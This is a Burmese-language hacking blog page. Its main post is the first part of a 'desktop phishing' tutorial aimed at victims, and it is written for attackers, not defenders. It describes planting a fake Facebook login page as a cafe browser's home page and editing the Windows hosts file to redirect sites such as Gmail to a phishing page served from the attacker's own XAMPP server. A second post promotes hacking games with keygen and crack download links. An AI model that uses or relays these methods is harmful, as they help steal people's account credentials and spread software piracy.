နည္းလမ္းတစ္ခ်ိဳ႕ ကိုထြင္ ၾကရင္းနဲ႕ Desktop phishing ဆိုတာေပၚေပါက္လာပါတယ္…….။

What is Desktop Phishing?

Desktop phishing ဆိုတာဟာ အလြယ္တကူေျပာရမယ္ဆိုရင္ သားေကာင္ေတြဆီ ကို phishing page  link ေတြကို တိုက္ရိုက္ေပး ပို႕ျခင္းမရိွပဲ နဲ႕ ထိုလင့္ေတြကို သားေကာင္ေတြရဲ႕ စက္ထဲမွာပဲ ၀င္ေရာက္ေနရာယူႏိုင္ေအာင္ စီစဥ္ ေဆာင္ရြက္ ေပးျခင္းျဖစ္ပါတယ္…။နည္းလမ္းေတြကေတာ့ အမ်ိဳးမ်ိဳးရိွပါတယ္……အဓိက ကလိုတာေတာ့ ျဖတ္ထိုးညဏ္လို႕ ပဲ ေျပာျခင္ပါတယ္…..။အလြယ္ ဆံုးနည္းလမ္းကေတာ့ မိမိ duplicate page link ကို Browser ရဲ႕ home page မွာ၀င္ေျပာင္းထားလိုက္ရုံပါပဲ……..။သားေကာင္ဟာ Browser ကိုဖြင့္လိုက္တာနဲ႕ တန္းျပီးေတာ့ flake login page ကို တန္းေရာက္သြားမွာျဖစ္ပါတယ္….။ဥပမာ facebook page အတုလိုမ်ိဳးေပါ့…….။ဒါေပမယ့္လဲဒီနည္းက LAN area ထဲမွာပဲေကာင္းပါတယ္…။ အင္တာနက္ကဖီးလိုေနရာမ်ိဳးမွာေပါ့…..။ကို္ယ္သြားသံုးရင္းနဲ႕ flake pageခ်န္ခဲ့ေပါ့…..။ဒီနည္းကလဲသိပ္မထူးျခားပါဘူး…..ရိုးလြန္းပါတယ္…။ ေနာက္တစ္နည္းကေတာ့ host file ကိုေျပာင္းလဲ ျပင္ဆင္ ျခင္းပါ..။ဒီေနရာမွာလဲ Local attack နဲ႕ online attack လို႕ ခြဲျခားထားပါ့မယ္……..။

Host file replacing method

ဒီအမ်ိဳးအစားကေတာ့ Desktop phishing အမ်ိဳးအစားျဖစ္ျပီးေတာ့ window directory ထဲမွာရိွတဲ့ host file ထဲက text အခ်ိဳ႕ကို ေျပာင္းလဲ ျပင္ဆင္ျခင္းျဖစ္ပါတယ္……..။ေျပာရမယ္ဆိုရင္သားေကာင္ေတြဟာ အစစ္အမွန္ website ကိုသြားေပမယ့္လဲ လိုအပ္တဲ့ ေနရာကို မေရာက္ရွိ ပဲ hacker ေတြရဲ႕ duplicate page ေတြဆီကို တိုက္ရိုက္ေရာက္ရိွ ေအာင္ျပဳလုပ္ျခင္းပဲျဖစ္ပါတယ္…..။ပိုမိုနားလည္ေအာင္ ပံုႏွင့္တကြ ေဖာ္ျပေပးလိုက္ပါတယ္……။ေအာက္ေဖာ္ျပ ပါပံုေလးကေတာ့ သာမန္ phishing method နဲ႕ Desktop phishing method တို႕ ကြာ ျခားပံုေလးပဲျဖစ္ပါတယ္..။



Step to Perform Desktop Phishing

Necessaries

  1. Xampp (Download)
  2. Wnirar
  3. notepad or notepad++
  4. flake login page
  5. your iq

What is host file?

host file ဆိုတာဟာ ဖိုင္တစ္ခုျဖစ္ပါတယ္…..ကဲေအးေရာ….။ဘယ္မွာရိွလဲဆိုတာ ကေတာ့ C:\Windows\System32\drivers\etc\ အဲဒီလို သြားလိုက္ရင္ ေတြ႕ႏိုင္ပါတယ္….(မွတ္ခ်က္။   ။ကၽြန္ေတာ္ XP နဲ႕ပဲအသံုးျပဳေနျခင္းျဖစ္ပါတယ္…) ။သူကဘာလုပ္ေပးလဲ ဆိုေတာ့ ကၽြန္ေတာ္တို႕ ၀င္ ေရာက္ၾကည့္ရႈထားတဲ့ဆိုက္ေတြ ရဲ႕ Ip address နဲ႕ Domain name ေတြကိုမွတ္ထားပါတယ္…။လိုအပ္သလိုလဲေျပာင္းလဲလို႕ရပါတယ္…..။ အရွင္းဆံုး ေျပာရမယ္ဆိုရင္ ကၽြန္ေတာ္တို႕ရိုက္လိုက္တဲ့ Web လိပ္စာေတြကို IP နဲ႕ check ျပီးေတာ့ အဲဒါနဲ႕  ျပန္လည္ဆက္သြယ္ျပီး ျပန္လည္ခ်ျပ ေဖာ္ျပေပးတာျဖစ္ပါတယ္……။နဲနဲရႈပ္သြားတယ္ဆိုရင္လဲဒီလိုပဲမွတ္ထားေပးပါ…….။ေနာက္ေတာ့ မွ လုပ္ရင္းကိုင္ရင္ နားလည္သြားပါလိမ့္မယ္……။ဒီေလာက္ပဲရွင္းျပခ်င္ပါတယ္……တကယ္ရွင္းျပရရင္ေတာ့ ေတာ္ေတာ္ေလးက ပိုစ့္ကရွည္သြံားပါ လိမ့္မယ္….ဖတ္တဲ့သူေတြလဲ ျပင္ကုန္ၾကမွာေပါ့…..ဟီးဟီး။

အဲဒီ host ဖိုင္ေလးကိုေလ့လာလိုက္ၾကရေအာင္…။ကၽြန္ေတာ့္တို႕ အေနနဲ႕ window မွာပါတဲ့ notepad နဲ႕လဲ edit လုပ္လို႕ရသလို notepad++ ကိုလဲသံုးႏိုင္ပါေသးတယ္….။ၾကိဳက္တာနဲ႕ လုပ္ေပါ့ ….။ကၽြန္ေတာ္ကေတာ့ အဲဒီဖိုင္ေလးကို notepad ကိုပဲသံုးျပီးေတာ့ဖြင့္လိုက္ပါတယ္…။ျပီးေတာ့ ကၽြန္ေတာ္ဟာ Ip address တစ္ခုကိုျဖည့္လိုက္ျပီးေတာ့ သူနဲ႕သူတြဲ အလုပ္လုပ္မယ့္ URL ကိုျဖည့္လိုက္ပါတယ္…။ဒါဆိုရင္ေတာ့ သင္တစ္ခုေတာ့နား လာ္သြားပါလိမ့္မယ္……။ေအာက္ေဖာ္ျပပါ ပံုေလးကိုၾကည့္လိုက္ပါ….။ ကၽြန္ေတာ္ျပထားတဲ့ဥပမာ အတိုင္း www.anywebsite.com ကိုအလည္ သြားတဲ့အခါ သူ႕ရဲ႕ Ip address ကိုပါပူးတြဲမွတ္ေပးပါတယ္……….။



What is Attack?

ကၽြန္ေတာ္တို႕ အေနနဲ႕ web host ေတြကိုသံုးတဲ့အခါ ဥပမာ 110mb.com,ripway လိုဟာမ်ိဳးေပါ့……။ IP address ကိုေထာက္ပံမေပးပါဘူး…။
သူကသင့္ ဆိုက္ကိုဒါမ်ိဳးေထာက္ပံေပးပါတယ္…www.anything.110mb.com ။ဒါေၾကာင့္ ကၽြန္ေတာ့္တို႕ဟာ ကၽြန္ေတာ္တို႕ computer ကို phishing page ကို  host ထားဖို႕ sever အျဖစ္ေျပာင္းဖို႕လိုအပ္ပါတယ္…..။ဒါကိုလို ဘယ္လို attack လုပ္မလဲဆိုရင္ ေအာက္ကပံုေလးကိုၾကည့္ လိုက္ပါ….။တစ္ခ်ိဳ႕ online host site ေတြ ip ေပးသလားဆိုတာကၽြန္ေတာ္ေတာ့ မေတြ႕ ဘူးေသးဘူး…..။ရိွခ်င္လဲရိွလိမ့္ပါမယ္…။


 ကၽြန္ေတာ္တို႕ အထက္ကပံုေလးကို ၾကည့္လိုက္ပါ…….။ xxx.xxx.xxx.xxx ဆိုတာက ခုနက phishing page ကို host လုပ္ထားတဲ့ ip address ျဖစ္ပါတယ္…။ host file ထဲမွာျပန္ျပင္ထားတာပါ…..။သားေကာင္ေတြဟာ www.gmail.com ကိုသြားေပမယ့္လဲ သင္ သင့္ စက္ထဲမွာ host လုပ္ထားတဲ့ ip ဆီကိုပဲသြားမွာျဖစ္ပါတယ္…..ေျပာရရင္ သင့္ စက္ထဲမွာ host လုပ္ထားတဲ့ phishing page ဆီကိုပဲေရာက္သြားမွာျဖစ္ပါတယ္.. ဒါေၾကာင့္သင့္ စက္ထဲမွာ websever ျပဳလုပ္ျပီး webpage ေတြကို host ျပဳလုပ္ထားဖို႕လိုပါတယ္….။အဲဒီလိုလုပ္ ဖို႕ Xampp ကိုသံုးရပါမယ္…။

part 2 ေမွ်ာ္
posted by me
You also see Here
Read More ->>

Confessions of Teenage Hackers:Part I :Mafia Boy



Download

မူရင္းစာေရးသူရဲ႕ ကိုယ္ေတြ႕မွတ္တမ္းျဖစ္ျပီး သူ႕ရဲ႕ဘ၀ဇာတ္ေၾကာင္းမွာ Hacking အေပၚထားရွိတဲ့သူ႕သေဘာထား သူ႕အျမင္ သူ႕အယူအဆ သူ႕ခံစားခ်က္ေတြအျပင္ အေမရိကန္ စစ္ဌာနခ်ဳပ္ ပင္တဂြန္ကို ေဖာက္ထြင္းဖို႕ၾကိဳးစားခဲ့ဖူးတဲ့သူ႕ရဲ႕ အေတြ႕အၾကံဳေတြမွာ ဖတ္ရႈရမွာျဖစ္ပါတယ္

မူရင္း.......Ghostarea.net

Read More ->>

Wednesday, July 11, 2012

Hackers and Hacking Games



ဒီတစ္ေခါက္ေတာ့ Hacker တစ္ေယာက္အေနနဲ႕ ကစားရမယ့္ Game ေလးေတြ ျပန္လည္မွ်ေ၀လိုက္ပါတယ္ ။ Game ဆိုေပမယ့္ ဒီ Game ကေန သီအိုရီပိုင္းေတြကို သိနိုင္တယ္ ျပီးေတာ့ ကိုယ္မၾကံဳဖူးတဲ့ အျခားတစ္ေယာက္နဲ့ ယွဥ္ျပိဳင္မွုေတြကို ရနိုင္ပါတယ္။ ဒါ့အျပင္ Trace အလိုက္ခံရတာေတြ ျပိဳင္ဘက္ေတြနဲ႕ ယွဥ္ျပိဳင္ရတာေတြေၾကာင့္ လွ်ိဳ႕၀ွက္သည္းဖို ခံစားခ်က္ေတြကိုလည္း ရရွိႏုိင္မွာျဖစ္ပါတယ္ ။ 1. Blue Sky Simulation A/CBlue sky:: Acceptable Casualties ဆိုတဲ့ Hacking Simulation ကို exoSyphen Studios ကေရးဆြဲျပီး TermialZero ကေန publish လုပ္ပါတယ္။ ဒီဂိမ္းမွာေတာ့ graphic လဲေကာင္းပါတယ္။ ျပီးေတာ့ ဂိမ္းကစားေနတဲ့သူဟာ experienced Hacker တစ္ေယာက္အျဖစ္ အခ်ိန္ကိုက္ ေဆာ့နိုင္ရမွာျဖစ္ပါတယ္။ အခုတင္ေပးတာက Developer version ပါ။ အမွန္တကယ္ features အျပည့္အစံုေဆာ့ခ်င္ရင္ ေတာ့ 9.95$ ေလာက္ရွိပါတယ္။ purchase လုပ္ျပီးေဆာ့ရင္ custom interface skins ေတြ complete new game graphic ေတြရနိုင္ပါတယ္။ျပီးေတာ့ custom mission ေတြ levels နဲ့ game mods အသစ္ေတြ လဲ support လုပ္ပါတယ္ ။ Visual C++ 6.0 ရွိရင္ ပိုျပီး အလုပ္နုိင္ပါတယ္။ Developer version မွာေတာ့ source code ပဲပါလာမွာပါ။ ကိုယ့္ဘာသာကိုယ္ Visual C++နဲ့ ျပန္ေရးရမွာျဖစ္ပါတယ္။ တကယ္ programmer အတြက္ကေတာ့ အရမ္းေကာငး္တဲ့ စီစဥ္မွုတစ္ခုျဖစ္ပါတယ္။ run လို့ေကာင္းသြားရင္ CD နဲ့ Burn ျပီး install လုပ္ေပးရမွာခင္ဗ်ာ။ကိုယ္ေဆာ့မယ့္ hacking simulation ဂိမ္းေကာင္းတစ္ခု ကို ကိုယ္ပိုင္ဖန္တီးရတဲ့အရသာဟာ ဘာနဲ့မွ မလဲနိုင္တာေတြ့ရပါမယ္။ Download Link:: http://www.shareup.com/Blue_Sky_AC-download-10814.html


Digital Hazard
ဒီGame ဟာလဲ hacking simulator Game တစ္ခုျဖစ္ပါတယ္။ ExoSyphen Studio ကပဲ Develop လုပ္ပါတယ္။ ဒီတစ္ခါ ေဆာ့တဲ့လူက worldwide computer networking ထဲ ရဲ့အတြင္းမွာဘာရွိသလဲလို့စူးစမး္ရင္း Underground (ေျမၾကီးေအာက္မဟုတ္ပါ တရားဥပေဒ ေဘာင္မဝင္တဲ့ေလာကကို ေခၚသည္) ထဲေရာက္သြားပါတယ္။ အဲ့လိုနဲ့ Hacker တစ္ေယာက္အေနနဲ့ ကမၻာတစ္ပတ္ကို ေနရာတစ္ရာကေနေျခဆန့္ေနခိုက္ ESK ဆိုတဲ့ Organization တစ္ခုရဲ့ အတြင္းေရးကို Hack ရမွာျဖစ္ပါတယ္။ အလြန္ေကာင္းမြန္တဲ့ Graphic နဲ့ ထုတ္လုပ္ထားျပီး Avenue 5 မွ Sound track ေတြနဲ့တည္ေဆာက္ထားပါတယ္။ ဒီGame ဟာ အခ်ိန္ကို အသံုုးခ်တတ္ေအာင္ ျပီးေတာ့ စဥ္းစားဥာဏ္ရည္တက္ေအာင္ တီထြင္ထားပါတယ္။ ဒါတင္မကေသးပါဘူး ေဆာ့ေနသူကို အလြန္တ၇ာနက္တဲ့ ေခ်ာက္ရဲ့ကမ္းပါးေပၚမွာေလွ်ာက္ေနရသလို ခံစား၇ေအာင္ ရင္တလွပ္လွပ္နဲ့ေဆာ့နိုင္ ေအာင္လုပ္ထားပါတယ္။ ဒီGame သည္လဲ free မဟုတ္ေခ်။ ဒါေပမဲ့သူအတြက္ Crack generator ေတြရွိပါတယ္။ တစ္ခါတည္းတြဲတင္ေပးလုိက္ပါတယ္။ Full version မွာ ဆိုရင္ Custom Game မ်ားကို ေဆာ့နုိင္မွာ ျဖစ္ျပီး mods ေတြ lvl ေတြ missionေတြကို အသစ္ေတြရနိုင္မွာ ျဖစ္ပါတယ္။ addional missionေတြကို download ခ်ျပီးလဲေဆာ့နိုင္မွာျဖစ္ပါတယ္။ သတိထားတတ္ေအာင္ ျပီးေတာ့ တကယ့္ ကို စိတ္လွုပ္ရွားစရာေကာင္းေအာင္ အျပင္မွာ တကယ္hack ေနျပီး White Hat ေတြရန္က ေနေရွာင္ ေနရမွာျဖစ္ပါတယ္။ တကယ့္ကို Game ေကာင္းတစ္ခု ျဖစ္ပါတယ္ Download Link: http://games.brothersoft.com/digital-hazard.html Download Keygen Link: http://www.cracksguru.com/data/Digital_Hazard_v1.0_keygen_by_DELiGHT-bee5631c96.html

 
Hacker Evolution
အဲ့ဂိမ္းကေတာ့ နာမည္ေက်ာ္ game ေကာင္းတစ္ခုပါပဲ။ ေဆာ့ရတာ အခ်ိန္ကုန္မွန္းမသိေအာင္ကို ေကာင္းတဲ့ Game ပါ။ ExoSyphen Studio ကပဲ Develop လုပ္ပါတယ္။ Version မ်ားကိုလဲ အသစ္ထြက္ပါတယ္။ DDOSer သမားမ်ားအတြက္ တကယ့္ပညာရတဲ့ဂိမ္းပါ။ Sever ေတြကို linked လုပ္ျပီးကိုယ္ မေပၚနိုင္ေအာင္ ခ်ိတ္ရပါ့မယ္။ Sever ေတြကို ေဖာက္ရင္ လဲ Password အမ်ိဳးမ်ိဳးကို Crack ရပါမယ္။ ဘဏ္ Database ေတြတိုက္ျပီး Money hack ရပါတယ္။ ျပီးရင္ ရတဲ့ပိုက္ဆံနဲ့ Processors ေတြ Firewallေတြ ခံျပီး တစ္ပါးေသာ White hat Hacker group ရန္မွလဲကာကြယ္ရပါေသးတယ္။ ျပီးေတာ့ DDOS attack တင္ မဟုတ္ပါဘူး EMP attack ေတြပါ အမုန္းေကၽြးရပါေသးတယ္။ ဒီGame သည္လည္း အေရွ့က ထြက္ခဲ့တဲ့ Game လို ပဲ Sound ေရာ Graphic လဲေကာင္းပါတယ္။ Full version မွာ ဆိုရင္ Custom Game မ်ားကို ေဆာ့နုိင္မွာ ျဖစ္ျပီး mods ေတြ lvl ေတြ missionေတြကို အသစ္ေတြရနိုင္မွာ ျဖစ္ပါတယ္။ အဲ့ Game ကို ျပည္တြင္းက Excellent အေခြ ဆိုင္မွာ ဝယ္ယူလို့ရပါတယ္။ Crack Version ရနိုင္ပါတယ္။ တစ္ခုေတာ့မွာမယ္ေနာ္ ဒါေတြေဆာ့မယ္ဆိုရင္ေတာ့ terminal ကို ၾကည့္တတ္မွရမယ္ေနာ္။ Download Link ( Demo ) : http://crazy4warez.blogspot.com/2009/03/hacker-evolution-pc-free-game-download.html ဒီသံုးခုဟာ နာမည္ၾကီးသလို အလြန္လည္း မုိက္တယ္ Hacker Game သံုးခုျဖစ္ပါတယ္ အေတြ႕အၾကံဳတစ္ခုေတာ့ရမွာပါ စမ္းၾကည့္လိုက္ပါ

posted by  Fortran
copy from ghostarea.net
Read More ->>

ROCK FOREVER (MUSIC)

Pageviewers

CBOX

Manutd-Results

Label

Android (3) autorun (3) Backtrack (8) batch file (19) blogger (10) Botnet (2) browser (5) Brute Force (6) cafezee (2) cmd (5) Cookies (2) crack (12) Cracking (2) crypter (7) DDos (20) deepfreeze (4) defacing (1) defence (16) domain (4) Dos (9) downloader (4) ebomb (2) ebook (48) Exploit (26) firewall (3) game (2) gmail (11) google hack (16) Hacking Show (3) Hash (4) hosting (1) icon changer (1) ip adress (6) Keygen (1) keylogger (8) knowledge (67) locker (1) maintainence (8) network (17) news (31) other (35) passwoard viewer (7) password (12) Philosophy (6) Phishing (8) premium account (2) proxy (7) RAT (10) run commands (4) script (27) Shell code (10) shortcut Key (2) SMTP ports (1) social engineering (7) spammer (1) SQL Injection (30) Stealer.crack (5) tools (125) Tools Pack (4) tutorial (107) USB (3) virus (32) website (84) WiFi (4) word list (2)

Blogger templates

picoodle.com

Blogger news

Print Friendly and PDF

HOW IS MY SITE?

Powered by Blogger.

Followers

About Me

My Photo
Hacking= intelligent+techonology+psychology